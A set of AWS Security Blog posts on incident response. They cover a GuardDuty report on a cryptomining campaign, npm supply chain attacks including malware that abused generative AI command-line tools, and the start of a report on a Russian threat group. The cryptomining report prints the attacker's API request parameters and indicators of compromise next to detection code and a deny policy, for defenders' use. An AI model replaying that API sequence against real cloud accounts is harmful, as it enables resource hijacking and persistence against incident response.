Pay attention to any rules that have partially migrated actions, which will be noted in the Description of each rule. This means one or more actions from the original rule in Security Hub CSPM aren’t supported in Security Hub and the rule might behave differently than intended. The solution also produces a migration report that includes which rules were partially migrated and specifies which actions from the original rule could not be migrated. Review these rules carefully because they might behave differently than expected and need to be modified or recreated.

Figure 5: Review the descriptions of partially migrated automation rules

Conclusion

The new AWS Security Hub provides enhanced capabilities for aggregating, correlating, and contextualizing your security findings. While the schema change from ASFF to OCSF brings improved interoperability and integration options, it requires existing automation rules to be migrated. The solution provided in this post helps automate this migration process through discovering your existing rules, transforming them to the new schema, and generating CloudFormation templates that preserve rule order and Regional context.

After migrating your automation rules, start by reviewing the migration report to identify any rules that weren’t fully migrated. Pay special attention to rules marked as partially migrated, because these might behave differently than their original versions. We recommend testing each rule in a disabled state and validating that rules work together as expected, especially rules that operate on the same fields, before enabling them in your environment.

To learn more about Security Hub and its enhanced capabilities, see the Security Hub User Guide.
If you have feedback about this post, submit comments in the Comments section below.

Joe Wagner

Joe Wagner

Joe is a Senior Security Specialist Solutions Architect who focuses on AWS security services. He loves that cybersecurity is always changing and takes pride in helping his customers navigate it all. Outside of work, you’ll find him trying new hobbies, exploring local restaurants, and getting outside as much as he can.

Ahmed Adekunle

Ahmed Adekunle

Ahmed is a Security Specialist Solutions Architect focused on detection and response services at AWS. Before AWS, his background was in business process management and AWS tech consulting, helping customers use cloud technology to transform their business. Outside of work, Ahmed enjoys playing soccer, supporting less privileged activities, traveling, and eating spicy food, specifically African cuisine.

Salifu (Sal) Ceesay

Salifu (Sal) Ceesay

Sal is a Technical Account Manager at Amazon Web Services (AWS) specializing in financial services. He partners with organizations to operationalize and optimize managed solutions across many use cases, with expertise in native incident detection and response services. Beyond his professional pursuits, Sal enjoys gardening, playing and watching soccer, traveling, and participating in various outdoor activities with his family.

GuardDuty Extended Threat Detection uncovers cryptomining campaign on Amazon EC2 and Amazon ECS

16 December 2025 at 23:12

Amazon GuardDuty and our automated security monitoring systems identified an ongoing cryptocurrency (crypto) mining campaign beginning on November 2, 2025. The operation uses compromised AWS Identity and Access Management (IAM) credentials to target Amazon Elastic Container Service (Amazon ECS) and Amazon Elastic Compute Cloud (Amazon EC2). GuardDuty Extended Threat Detection was able to correlate signals across these data sources to raise a critical severity attack sequence finding. Using the massive, advanced threat intelligence capability and existing detection mechanisms of Amazon Web Services (AWS), GuardDuty proactively identified this ongoing campaign and quickly alerted customers to the threat. AWS is sharing relevant findings and mitigation guidance to help customers take appropriate action on this ongoing campaign.

It’s important to note that these actions don’t take advantage of a vulnerability within an AWS service but rather require valid credentials that an unauthorized user uses in an unintended way. Although these actions occur in the customer domain of the shared responsibility model, AWS recommends steps that customers can use to detect, prevent, or reduce the impact of such activity.

Understanding the crypto mining campaign

The recently detected crypto mining campaign employed a novel persistence technique designed to disrupt incident response and extend mining operations. The ongoing campaign was originally identified when GuardDuty security engineers discovered similar attack techniques being used across multiple AWS customer accounts, indicating a coordinated campaign targeting customers using compromised IAM credentials.

Operating from an external hosting provider, the threat actor quickly enumerated Amazon EC2 service quotas and IAM permissions before deploying crypto mining resources across Amazon EC2 and Amazon ECS. Within 10 minutes of the threat actor gaining initial access, crypto miners were operational.

A key technique observed in this attack was the use of ModifyInstanceAttribute with disable API termination set to true, forcing victims to re-enable API termination before deleting the impacted resources. Disabling instance termination protection adds an additional consideration for incident responders and can disrupt automated remediation controls. The threat actor’s scripted use of multiple compute services, in combination with emerging persistence techniques, represents an advancement in crypto mining persistence methodologies that security teams should be aware of.

The multiple detection capabilities of GuardDuty successfully identified the malicious activity through EC2 domain/IP threat intelligence, anomaly detection, and Extended Threat Detection EC2 attack sequences. GuardDuty Extended Threat Detection was able to correlate signals as an AttackSequence:EC2/CompromisedInstanceGroup finding.

Indicators of compromise (IoCs)

Security teams should monitor for the following indicators to identify this crypto mining campaign. Threat actors frequently modify their tactics and techniques, so these indicators might evolve over time:

  • Malicious container image – The Docker Hub image yenik65958/secret, created on October 29, 2025, with over 100,000 pulls, was used to deploy crypto miners to containerized environments. This malicious image contained an SBRMiner-MULTI binary for crypto mining. This specific image has been taken down from Docker Hub, but threat actors might deploy similar images under different names.
  • Automation and tooling – AWS SDK for Python (Boto3) user agent patterns indicating Python-based automation scripts were used across the entire attack chain.
  • Crypto mining domains: asia[.]rplant[.]xyz, eu[.]rplant[.]xyz, and na[.]rplant[.]xyz.
  • Infrastructure naming patterns – Auto scaling groups followed specific naming conventions: SPOT-us-east-1-G*-* for spot instances and OD-us-east-1-G*-* for on-demand instances, where G indicates the group number.
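If you want to sweep existing auto scaling group names for the naming convention listed above, a simple regular expression check is enough. This sketch hard-codes the reported us-east-1 pattern; adjust it if the campaign's naming evolves or expands to other Regions.

```python
import re

# Matches the reported IoC patterns SPOT-us-east-1-G<n>-* and
# OD-us-east-1-G<n>-*, where <n> is the group number.
ASG_IOC = re.compile(r"^(SPOT|OD)-us-east-1-G\d+-.+$")

def looks_like_campaign_asg(name):
    """True when an auto scaling group name matches the campaign IoC."""
    return ASG_IOC.match(name) is not None
```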

Attack chain analysis

The crypto mining campaign followed a systematic attack progression across multiple phases. Sensitive fields in this post were given fictitious values to protect personally identifiable information (PII).

Figure 1: Cryptocurrency mining campaign diagram

Initial access, discovery, and attack preparation

The attack began with compromised IAM user credentials possessing admin-like privileges from an anomalous network and location, triggering GuardDuty anomaly detection findings. During the discovery phase, the attacker systematically probed customer AWS environments to understand what resources they could deploy. They checked Amazon EC2 service quotas (GetServiceQuota) to determine how many instances they could launch, then tested their permissions by calling the RunInstances API multiple times with the DryRun flag enabled.

The DryRun flag was a deliberate reconnaissance tactic that allowed the actor to validate their IAM permissions without actually launching instances, avoiding costs and reducing their detection footprint. This technique demonstrates the threat actor was validating their ability to deploy crypto mining infrastructure before acting. Organizations that don’t typically use DryRun flags in their environments should consider monitoring for this API pattern as an early warning indicator of compromise. AWS CloudTrail logs can be used with Amazon CloudWatch alarms, Amazon EventBridge, or your third-party tooling to alert on these suspicious API patterns.
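One way to watch for this pattern is to scan CloudTrail events for repeated DryRun probes. CloudTrail records a permitted DryRun call with the error code Client.DryRunOperation, which the sketch below keys on; the event shape is the standard CloudTrail record format, and the threshold is an arbitrary example value.

```python
from collections import Counter

def dry_run_probes(cloudtrail_events, threshold=3):
    """Return identity ARNs that issued `threshold` or more DryRun probes.
    CloudTrail marks a permitted DryRun call with errorCode
    "Client.DryRunOperation" rather than a normal success record."""
    probes = Counter(
        e.get("userIdentity", {}).get("arn", "unknown")
        for e in cloudtrail_events
        if e.get("errorCode") == "Client.DryRunOperation"
    )
    return [arn for arn, n in probes.items() if n >= threshold]
```

The same condition can drive an EventBridge rule or CloudWatch alarm for near-real-time alerting instead of batch scanning.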

The threat actor called two APIs to create IAM roles as part of their attack infrastructure: CreateServiceLinkedRole to create a role for auto scaling groups and CreateRole to create a role for AWS Lambda. They then attached the AWSLambdaBasicExecutionRole policy to the Lambda role. These two roles were integral to the impact and persistence stages of the attack.

Amazon ECS impact

The threat actor first created dozens of ECS clusters across the environment, sometimes exceeding 50 ECS clusters in a single attack. They then called RegisterTaskDefinition with a malicious Docker Hub image yenik65958/secret:user. With the same string used for the cluster creation, the actor then created a service, using the task definition to initiate crypto mining on ECS AWS Fargate nodes. The following is an example of API request parameters for RegisterTaskDefinition with a maximum CPU allocation of 16,384 units.

{
    "dryrun": false,
    "requiresCompatibilities": ["FARGATE"],
    "cpu": 16384,
    "containerDefinitions": [
        {
            "name": "a1b2c3d4e5",
            "image": "yenik65958/secret:user",
            "cpu": 0,
            "command": []
        }
    ],
    "networkMode": "awsvpc",
    "family": "a1b2c3d4e5",
    "memory": 32768
}

Using this task definition, the threat actor called CreateService to launch ECS Fargate tasks with a desired count of 10.

{
    "dryrun": false,
    "capacityProviderStrategy": [
        {
            "capacityProvider": "FARGATE",
            "weight": 1,
            "base": 0
        },
        {
            "capacityProvider": "FARGATE_SPOT",
            "weight": 1,
            "base": 0
        }
    ],
    "desiredCount": 10
}

Figure 2: Contents of the cryptocurrency mining script within the malicious image

The malicious image (yenik65958/secret:user) was configured to execute run.sh after deployment. run.sh runs the randomvirel mining algorithm against the mining pools asia|eu|na[.]rplant[.]xyz:17155 and uses nproc --all to set the miner's thread count to the number of available processor cores.

Amazon EC2 impact

The actor created two launch templates (CreateLaunchTemplate) and 14 auto scaling groups (CreateAutoScalingGroup) configured with aggressive scaling parameters, including a maximum size of 999 instances and desired capacity of 20. The following example of request parameters from CreateLaunchTemplate shows the UserData was supplied, instructing the instances to begin crypto mining.

{
    "CreateLaunchTemplateRequest": {
        "LaunchTemplateName": "T-us-east-1-a1b2",
        "LaunchTemplateData": {
            "UserData": "<sensitiveDataRemoved>",
            "ImageId": "ami-1234567890abcdef0",
            "InstanceType": "c6a.4xlarge"
        },
        "ClientToken": "a1b2c3d4-5678-90ab-cdef-EXAMPLE11111"
    }
}

The threat actor created auto scaling groups using both Spot and On-Demand Instances to make use of both Amazon EC2 service quotas and maximize resource consumption.

Spot Instance groups:

  • Targeted high performance GPU and machine learning (ML) instances (g4dn, g5, p3, p4d, inf1)
  • Configured with 0% on-demand allocation and capacity-optimized strategy
  • Set to scale from 20 to 999 instances

On-Demand Instance groups:

  • Targeted compute, memory, and general-purpose instances (c5, c6i, r5, r5n, m5a, m5, m5n)
  • Configured with 100% on-demand allocation
  • Also set to scale from 20 to 999 instances

After exhausting auto scaling quotas, the actor directly launched additional EC2 instances using RunInstances to consume the remaining EC2 instance quota.

Persistence

An interesting technique observed in this campaign was the threat actor’s use of ModifyInstanceAttribute across all launched EC2 instances to disable API termination. Although instance termination protection prevents accidental termination of the instance, it adds an additional consideration for incident response capabilities and can disrupt automated remediation controls. The following example shows request parameters for the API ModifyInstanceAttribute.

{
    "disableApiTermination": {
        "value": true
    },
    "instanceId": "i-1234567890abcdef0"
}

After all mining workloads were deployed, the actor created a Lambda function with a configuration that bypasses IAM authentication and creates a public Lambda endpoint. The threat actor then added a permission to the Lambda function that allows the principal to invoke the function. The following examples show CreateFunctionUrlConfig and AddPermission request parameters.

CreateFunctionUrlConfig:

{
    "authType": "NONE",
    "functionName": "generate-service-a1b2c3d4"
}

AddPermission:

{
    "functionName": "generate-service-a1b2c3d4",
    "functionUrlAuthType": "NONE",
    "principal": "*",
    "statementId": "FunctionURLAllowPublicAccess",
    "action": "lambda:InvokeFunctionUrl"
}

The threat actor concluded the persistence stage by creating an IAM user user-x1x2x3x4 and attaching the IAM policy AmazonSESFullAccess (CreateUser, AttachUserPolicy). They also created an access key and login profile for that user (CreateAccessKey, CreateLoginProfile). Based on the SES role that was attached to the user, it appears the threat actor was attempting Amazon Simple Email Service (Amazon SES) phishing.

To prevent public Lambda function URLs from being created, organizations can deploy service control policies (SCPs) that deny creating or updating function URL configurations with an AuthType of "NONE".

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Deny",
            "Action": [
                "lambda:CreateFunctionUrlConfig",
                "lambda:UpdateFunctionUrlConfig"
            ],
            "Resource": "arn:aws:lambda:*:*:function:*",
            "Condition": {
                "StringEquals": {
                    "lambda:FunctionUrlAuthType": "NONE"
                }
            }
        }
    ]
}
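The intent of this SCP can be expressed as a small predicate, which is a convenient way to sanity-check the expected policy behavior before deployment. This is a pure-logic sketch of the condition, not an IAM policy evaluator.

```python
# Pure-logic sketch of the SCP above: deny creating or updating a Lambda
# function URL configuration whose AuthType is NONE.
DENIED_ACTIONS = {
    "lambda:CreateFunctionUrlConfig",
    "lambda:UpdateFunctionUrlConfig",
}

def scp_denies(action, function_url_auth_type):
    """True when the sketched SCP would deny the request."""
    return action in DENIED_ACTIONS and function_url_auth_type == "NONE"
```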

Detection methods using GuardDuty

The multilayered detection approach of GuardDuty proved highly effective in identifying all stages of the attack chain using threat intelligence, anomaly detection, and the recently launched Extended Threat Detection capabilities for EC2 and ECS.

Next, we walk through the details of these features and how you can deploy them to detect attacks such as these. You can enable the GuardDuty foundational protection plan to receive alerts on crypto mining campaigns like the one described in this post. To further enhance detection capabilities, we highly recommend enabling GuardDuty Runtime Monitoring, which extends finding coverage to system-level events on Amazon EC2, Amazon ECS, and Amazon Elastic Kubernetes Service (Amazon EKS).

GuardDuty EC2 findings

Threat intelligence findings for Amazon EC2 are part of the GuardDuty foundational protection plan, which will alert you to suspicious network behaviors involving your instances. These behaviors can include brute force attempts, connections to malicious or crypto domains, and other suspicious behaviors. Using third-party threat intelligence and internal threat intelligence, including active threat defense and MadPot, GuardDuty provides detection over the indicators in this post through the following findings: CryptoCurrency:EC2/BitcoinTool.B and CryptoCurrency:EC2/BitcoinTool.B!DNS.

GuardDuty IAM findings

The IAMUser/AnomalousBehavior findings spanning multiple tactic categories (PrivilegeEscalation, Impact, Discovery) showcase the ML capability of GuardDuty to detect deviations from normal user behavior. In the incident described in this post, the compromised credentials were detected due to the threat actor using them from an anomalous network and location and calling APIs that were unusual for the accounts.

GuardDuty Runtime Monitoring

GuardDuty Runtime Monitoring is an important component for Extended Threat Detection attack sequence correlation. Runtime Monitoring provides host level signals, such as operating system visibility, and extends detection coverage by analyzing system-level logs indicating malicious process execution at the host and container level, including the execution of crypto mining programs on your workloads. The CryptoCurrency:Runtime/BitcoinTool.B!DNS and CryptoCurrency:Runtime/BitcoinTool.B findings detect network connections to crypto-related domains and IPs, while the Impact:Runtime/CryptoMinerExecuted finding detects when a process running is associated with a cryptocurrency mining activity.

GuardDuty Extended Threat Detection

Launched at re:Invent 2025, the AttackSequence:EC2/CompromisedInstanceGroup finding represents one of the latest Extended Threat Detection capabilities in GuardDuty. This feature uses AI and ML algorithms to automatically correlate security signals across multiple data sources to detect sophisticated attack patterns of EC2 resource groups. Although AttackSequences for EC2 are included in the GuardDuty foundational protection plan, we strongly recommend enabling Runtime Monitoring. Runtime Monitoring provides key insights and signals from compute environments, enabling detection of suspicious host-level activities and improving correlation of attack sequences. For AttackSequence:ECS/CompromisedCluster attack sequences, Runtime Monitoring is required to correlate container-level activity.

Monitoring and remediation recommendations

To protect against similar crypto mining attacks, AWS customers should prioritize strong identity and access management controls. Implement temporary credentials instead of long-term access keys, enforce multi-factor authentication (MFA) for all users, and apply least privilege to IAM principals limiting access to only required permissions. You can use AWS CloudTrail to log events across AWS services and combine logs into a single account to make them available to your security teams to access and monitor. To learn more, refer to Receiving CloudTrail log files from multiple accounts in the CloudTrail documentation.

Confirm that GuardDuty is enabled across all accounts and Regions, with Runtime Monitoring turned on for comprehensive coverage. Integrate GuardDuty with AWS Security Hub and Amazon EventBridge or third-party tooling to enable automated response workflows and rapid remediation of high-severity findings. Implement container security controls, including image scanning policies and monitoring for unusual CPU allocation requests in ECS task definitions. Finally, establish specific incident response procedures for crypto mining attacks, including documented steps to handle instances with disabled API termination, a technique used by this attacker to complicate remediation efforts.
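As one way to sketch the automated-response integration described above, the following Python snippet (an illustrative stand-in, not an official AWS sample) mimics the filtering an Amazon EventBridge rule would perform on high-severity GuardDuty findings before invoking a remediation workflow. The event fields are trimmed from the GuardDuty finding format, and the 7.0 threshold reflects GuardDuty's numeric High severity range.

```python
# Illustrative sketch: decide whether a GuardDuty finding event should be
# routed to an automated remediation workflow. match logic is a simplified
# local stand-in for an EventBridge rule, not the real service.

HIGH_SEVERITY_THRESHOLD = 7.0  # GuardDuty labels findings >= 7.0 as High

def is_high_severity_finding(event: dict) -> bool:
    """Return True for GuardDuty finding events at or above the threshold."""
    if event.get("source") != "aws.guardduty":
        return False
    detail = event.get("detail", {})
    return float(detail.get("severity", 0)) >= HIGH_SEVERITY_THRESHOLD

# Example event, trimmed to the fields the filter inspects.
sample_event = {
    "source": "aws.guardduty",
    "detail-type": "GuardDuty Finding",
    "detail": {"type": "Impact:Runtime/CryptoMinerExecuted", "severity": 8.0},
}
```

In a real deployment, the equivalent filtering would live in the EventBridge rule's event pattern, with the rule target pointing at your remediation automation.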

If you believe your AWS account has been impacted by a crypto mining campaign, refer to remediation steps in the GuardDuty documentation: Remediating potentially compromised AWS credentials, Remediating a potentially compromised EC2 instance, and Remediating a potentially compromised ECS cluster.

To stay up to date on the latest techniques, visit the Threat Technique Catalog for AWS.


If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.

Kyle Koeller
Kyle is a security engineer in the GuardDuty team with a focus on threat detection. He is passionate about cloud threat detection and offensive security, and he holds the following certifications: CompTIA Security+, PenTest+, CompTIA Network Vulnerability Assessment Professional, and SecurityX. When not working, Kyle enjoys spending his time in the gym and exploring New York City.

What AWS Security learned from responding to recent npm supply chain threat campaigns

15 December 2025 at 22:12

AWS incident response operates around the clock to protect our customers, the AWS Cloud, and the AWS global infrastructure. Through that work, we learn from a variety of issues and spot unique trends.

Over the past few months, high-profile software supply chain threat campaigns involving third-party software repositories have highlighted the importance of protecting software supply chains for organizations of all types. In this post, we share how AWS responded to recent threats like the Nx package compromise, the Shai-Hulud worm, and a token-farming campaign in which Amazon Inspector identified more than 150,000 malicious packages (one of the largest attacks ever seen in open-source registries).

AWS Security responded to each of the examples in this post with a methodical and systematic approach. A key part of our incident response approach is to continually drive improvements into our response workflow and security systems to improve ahead of future incidents. We are also deeply committed to helping our customers and the global security community improve. Our goal with this post is to share our experiences responding to these incidents and to share the lessons we’ve learned.

Nx compromise attempts to scale through Generative AI

In late August 2025, abnormal patterns in generative AI prompt executions from third-party software triggered an immediate escalation to our incident response teams. Within 30 minutes, a security incident command was established, and teams around the world began coordinating an investigation.

The investigation uncovered and confirmed the presence of a JavaScript file, “telemetry.js”, that was designed to exploit generative AI command line tools through a popular npm package called Nx that had been compromised. Our teams analyzed the malware and confirmed that the actors were attempting to steal sensitive configuration files through GitHub. However, they failed to generate valid access tokens, which prevented any data from being compromised. This analysis produced critical data that helped our teams take direct action to protect AWS and our customers.

Working through our incident response process, some of the tasks our teams undertook included:

  • Produced a comprehensive impact assessment of AWS services and infrastructure. The assessment acts as a map that defines the scope of the incident and identifies the areas of the environment that need to be verified as part of the response.
  • Implemented repository-level blocklisting of npm packages to prevent further exposure to the compromised npm packages.
  • Conducted a deep dive to identify any potentially affected resources and look for any other attack vectors.
  • Investigated, analyzed, and remediated any affected hosts.
  • Used the learnings from our analysis to create improved detections across the environment and to enhance the security measures for Amazon Q. This included new system prompt guardrails to reject credential-harvesting, fixes to prevent system prompt extraction, and additional hardening measures for high-privilege execution modes.

The learnings from this work resulted in improvements that we folded into our incident response process, and we enhanced our detection mechanisms by improving how we monitor behavioral anomalies and cross-reference multiple intelligence sources. These efforts proved critical in identifying and responding to subsequent npm supply chain threat campaigns.

Shai-Hulud and other npm campaigns

Then, just three weeks later in early September 2025, two other npm supply chain campaigns began: the first targeted 18 popular packages (such as Chalk and Debug), and the second, dubbed “Shai-Hulud”, targeted 180 packages in its first wave, with a second wave, “Shai-Hulud 2”, occurring in late November 2025. These types of campaigns attempt to compromise trusted developer machines to gain a foothold in an environment.

The Shai-Hulud worm attempts to harvest npm tokens, GitHub personal access tokens, and cloud credentials. When npm tokens are found, Shai-Hulud expands its reach by publishing infected packages as updates to packages those tokens have access to in the npm registry. The now compromised packages will execute the worm as a postinstall script, continuing to propagate the infection as new users download them. The worm also attempts to manipulate GitHub repositories to use malicious workflows to propagate and maintain its foothold in the repositories it has already infected.
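The propagation step described above relies on npm's install-time lifecycle hooks. The following sketch, using a hypothetical manifest, shows how such hooks can be surfaced for review; running installs with npm's ignore-scripts option disables these hooks entirely.

```python
# Illustrative sketch: flag npm packages whose manifests declare install-time
# lifecycle scripts (the hook Shai-Hulud used to execute on download).
# A simplified local check, not a substitute for a real scanner.
import json

INSTALL_HOOKS = {"preinstall", "install", "postinstall"}

def install_scripts(package_json_text: str) -> dict:
    """Return the install-time lifecycle scripts declared in a package.json."""
    manifest = json.loads(package_json_text)
    scripts = manifest.get("scripts", {})
    return {name: cmd for name, cmd in scripts.items() if name in INSTALL_HOOKS}

# Hypothetical manifest with one install-time hook and one ordinary script.
suspicious = install_scripts(
    '{"name": "example-pkg", "scripts": {"postinstall": "node bundle.js", "test": "jest"}}'
)
```

`npm install --ignore-scripts` (or `npm config set ignore-scripts true`) prevents these hooks from running at install time, which blocks this propagation mechanism at the cost of breaking packages that legitimately depend on install scripts.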

While these events each took a different approach, the lessons AWS Security learned from the response to the Nx package compromise contributed to the response to these campaigns. Within 7 minutes of the publication of the packages affected by Shai-Hulud, we initiated our response process. Some of the key tasks we undertook during these responses included:

  • Registered the affected packages with the Open Source Security Foundation (OpenSSF), enabling a coordinated response across the security community.
    > Read more about how the Amazon Inspector team’s detection systems discovered these packages and how they work with the OpenSSF to help the security community respond to incidents like this one.
  • Performed monitoring to detect anomalous behavior. Where suspicious activity was detected, we took immediate action to notify impacted customers through AWS Personal Health Dashboard notifications, AWS Support cases, and direct email to the security contact for the accounts.
  • Analyzed the compromised npm packages to better understand the full capabilities of the worm, including development of a custom detonation script using generative AI, which was safely executed in a controlled sandbox environment. This work revealed the methods used by the malware to target GitHub tokens, AWS credentials, Google Cloud credentials, npm tokens, and environment variables. With this information, we used AI to analyze obfuscated JavaScript code to expand the scope of known indicators and affected packages.

By improving how we detect anomalous behavior that’s consistent with credential theft, how we analyze patterns across the npm repository, and, yet again, how we cross-reference multiple intelligence sources, AWS Security built a deeper understanding of these types of coordinated campaigns. That understanding helps distinguish legitimate package activity from malicious activity, and it helped our teams respond even more effectively just a month later.

tea[.]xyz token farming

In late October and into early November 2025, the detection techniques developed by the Amazon Inspector team and refined during the previous incidents identified a spike in compromised npm packages. The system discovered a renewed push to compromise the Tea tokens used to help recognize work done in the open-source community.

The team discovered 150,000 compromised packages during the threat actor’s campaign. For each detection, the team was able to automatically register the malicious package with the OpenSSF malicious package registry within 30 minutes. This rapid response not only protected customers using Amazon Inspector; by sharing these results with the community, other teams and tools could protect their environments as well.

Each time AWS Security teams identified a detection, we learned something new that we could incorporate into our incident response process to further enhance our detections. The unique target of this campaign, tea[.]xyz tokens, provided another vector to refine the detections and protections various AWS Security teams had in place.

And, as we were finalizing this post (December 2025), we encountered another wave of activity seemingly targeting npm packages: nearly 1,000 suspicious packages detected in the npm registry over the course of a week. This wave, referred to as “elf-”, was engineered to steal sensitive system data and authentication credentials. Our automated defense mechanisms swiftly identified these packages and reported them to the OpenSSF.

How you can protect your organization

In this post, we’ve described how we learn from our incident response process and how the recent supply chain campaigns targeting the npm registry have helped us improve our internal systems and the products our customers use to fulfill their responsibilities in the Shared Responsibility Model. While each customer’s scale and systems will differ, we recommend incorporating the AWS Well-Architected Framework and the AWS Security Incident Response Technical Guide into your organization’s operations, and adopting the following strategy to enhance the resilience of your organization against these types of attacks:

  1. Implement continuous monitoring and enhanced detections to identify unusual patterns, enabling early threat detection. Periodically audit security tooling detection coverage by comparing results against multiple authoritative sources. AWS services like AWS Security Hub provide a comprehensive view of the cloud environment, security findings, and compliance checks, enabling organizations to respond at scale, and Amazon Inspector can assist with continuous monitoring of the software supply chain.
  2. Adopt layered protection, including automated vulnerability scanning and management (e.g. Amazon GuardDuty and Amazon Inspector), behavioral monitoring for anomalous package behavior (e.g. Amazon CloudWatch and AWS CloudTrail), credential management (Security best practices in IAM), and network controls to prevent data exfiltration (AWS Network Firewall).
  3. Maintain a comprehensive inventory of all open-source dependencies, including transitive dependencies and deployment locations, enabling rapid response when threats are identified. AWS services like Amazon Elastic Container Registry (ECR) can assist with automatic container scanning to identify vulnerabilities, and AWS Systems Manager [1] [2] can be configured to meet security and compliance objectives.
  4. Report suspicious packages to maintainers, share threat intelligence with industry groups, and participate in initiatives that strengthen collective defense. See our AWS Security Bulletins page for more information about recently posted security bulletins. Partnering with and contributing to the global security community matters.
  5. Implement proactive research, comprehensive investigation, and coordinated response (e.g. AWS Security Incident Response), which combine security tooling, subject matter experts, and practiced response procedures.
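As a minimal illustration of recommendation 3 above, the sketch below walks a package-lock.json (lockfile version 2/3, which records a flat "packages" map) to inventory direct and transitive dependencies. The lockfile content here is hypothetical.

```python
# Illustrative sketch: enumerate every dependency, including transitive ones,
# recorded in an npm package-lock.json (lockfileVersion 2/3).
import json

def dependency_inventory(lockfile_text: str) -> dict:
    """Map each dependency name to its pinned version."""
    lock = json.loads(lockfile_text)
    inventory = {}
    for path, meta in lock.get("packages", {}).items():
        if not path:  # the "" key is the root project itself
            continue
        # Nested paths like node_modules/a/node_modules/b name transitive deps.
        name = path.split("node_modules/")[-1]
        inventory[name] = meta.get("version")
    return inventory

# Hypothetical lockfile with one direct and one transitive dependency.
lock_text = '''{
  "lockfileVersion": 3,
  "packages": {
    "": {"name": "my-app"},
    "node_modules/chalk": {"version": "5.3.0"},
    "node_modules/chalk/node_modules/debug": {"version": "4.3.4"}
  }
}'''
inventory = dependency_inventory(lock_text)
```

A real inventory would also record where each dependency is deployed, so that a newly published IOC can be matched against affected environments quickly.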

Supply chain attacks continue to evolve in sophistication and scale, as demonstrated by the examples in this post. These campaigns share common patterns: exploiting trust relationships within the open-source ecosystem, operating at massive scale, harvesting credentials and gaining unauthorized access to secrets, and using enhanced techniques to evade traditional security controls.

The lessons learned from these events underscore the critical importance of implementing layered security controls, maintaining continuous monitoring, and participating in collaborative defense efforts. As these threats continue to evolve, AWS continues to provide customers with ongoing protection through our comprehensive security approach. We are committed to continuous learning to improve our work, help our customers, and help the security community.

Contributors to this post: Mark Nunnikhoven, Catherine Watkins, Tam Ngo, Anna Brinkmann, Christine DeFazio, Chris Warfield, David Oxley, Logan Bair, Patrick Collard, Chun Feng, Sai Srinivas Vemula, Jorge Rodriguez, and Hari Nagarajan



Nikki Pahliney
Nikki is the AWS Security Messaging Manager, heading up a team of security messaging specialists involved in curating security communications for our external customers, managing the AWS Security Blog and aws.amazon.com/security web content. Her experience spans IT security and security messaging, operational process redesign, technical program management, financial modeling, business management, and recruitment.
David Magnotti
David Magnotti is a Principal Security Engineer in Amazon Threat Intelligence, where he helps design and operate the investigative programs that underpin Amazon’s cyber threat intelligence capabilities. His work focuses on analyzing cyber threat activity, including state-sponsored and sophisticated criminal activity, translating relevant findings into actionable protections across Amazon and AWS.
Jeff Laskowski
Jeff is a seasoned cybersecurity and IT executive with over 30 years of experience in enterprise transformation and strategic innovation. Currently serving as a Senior Manager at AWS, he focuses on global corporate cybersecurity response. His distinguished career includes leading high-profile cyber incident investigations, directing cyber attack recoveries, and driving strategic initiatives. A Computer Science graduate from Old Dominion University and based in Herndon, Virginia, Jeff’s expertise spans software development, enterprise architecture and secure IT environments.
Ryan Tick
Ryan is a Senior Security Engineer at AWS focused on threat detection and incident response at scale. Before AWS, he worked as a consultant helping customers prevent, prepare, and respond to potential security events in AWS. Outside of work, Ryan enjoys spending time with his family, cheering on the Notre Dame Fighting Irish football team, and traveling.
Charlie Bacon
Charlie is Head of Security Engineering and Research for Amazon Inspector at AWS. He leads the teams behind the vulnerability scanning and inventory collection services which power Amazon Inspector and other Amazon Security vulnerability management tools. Before joining AWS, he spent two decades in the financial and security industries where he held senior roles in both research and product development.
Chi Tran
Chi is a Senior Security Researcher at Amazon Web Services, specializing in open-source software supply chain security. He leads the R&D of the engine behind Amazon Inspector that detects malicious packages in open-source software. As an Amazon Inspector SME, Chi provides technical guidance to customers on complex security implementations and advanced use cases. His expertise spans cloud security, vulnerability research, and application security. Chi holds industry certifications including OSCP, OSCE, OSWE, and GPEN, has discovered multiple CVEs, and holds pending patents in open-source security innovation.
Dan Dutrow
Dan is an AWS Security Software Development Manager heading up Sonaris, an internal tool used by Amazon to analyze security telemetry to identify and help stop network, application, and credential abuse across AWS. He is an experienced engineering leader of multidisciplinary teams using software engineering, data science, and security analysis to solve cloud security challenges.
Stephen Goodman

As a senior manager for Amazon active defense, Stephen leads data-driven programs to protect AWS customers and the internet from threat actors.

Albin Vattakattu

BlackHat and DEFCON speaker, Albin is a Senior Security Engineer and Team Lead at AWS. He brings over a decade of expertise in network and application security. Prior to AWS, he led incident response teams across North and South America. Albin holds a Master’s degree in cybersecurity from New York University along with multiple security certifications, including CISSP.

Amazon Threat Intelligence identifies Russian cyber threat group targeting Western critical infrastructure

15 December 2025 at 20:20

As we conclude 2025, Amazon Threat Intelligence is sharing insights about a years-long Russian state-sponsored campaign that represents a significant evolution in critical infrastructure targeting: a tactical pivot in which what appear to be misconfigured customer network edge devices became the primary initial access vector while vulnerability exploitation activity declined. This tactical adaptation achieves the same operational outcomes (credential harvesting and lateral movement into victim organizations’ online services and infrastructure) while reducing the actor’s exposure and resource expenditure.

Going into 2026, organizations must prioritize securing their network edge devices and monitoring for credential replay attacks to defend against this persistent threat. Based on infrastructure overlaps with known Sandworm (also known as APT44 and Seashell Blizzard) operations observed in Amazon’s telemetry and consistent targeting patterns, we assess with high confidence this activity cluster is associated with Russia’s Main Intelligence Directorate (GRU). The campaign demonstrates sustained focus on Western critical infrastructure, particularly the energy sector, with operations spanning 2021 through the present day.

Technical details

Campaign scope and targeting: Amazon Threat Intelligence observed sustained targeting of global infrastructure from 2021 through 2025, with particular focus on the energy sector. The campaign demonstrates a clear evolution in tactics.

Timeline:

  • 2021-2022: WatchGuard exploitation (CVE-2022-26318) detected by Amazon MadPot; misconfigured device targeting observed
  • 2022-2023: Confluence vulnerability exploitation (CVE-2021-26084, CVE-2023-22518); continued misconfigured device targeting
  • 2024: Veeam exploitation (CVE-2023-27532); continued misconfigured device targeting
  • 2025: Sustained targeting of misconfigured customer network edge device targeting; decline in N-day/zero-day exploitation activity

Primary targets:

  • Energy sector organizations across Western nations
  • Critical infrastructure providers in North America and Europe
  • Organizations with cloud-hosted network infrastructure

Commonly targeted resources:

  • Enterprise routers and routing infrastructure
  • VPN concentrators and remote access gateways
  • Network management appliances
  • Collaboration and wiki platforms
  • Cloud-based project management systems

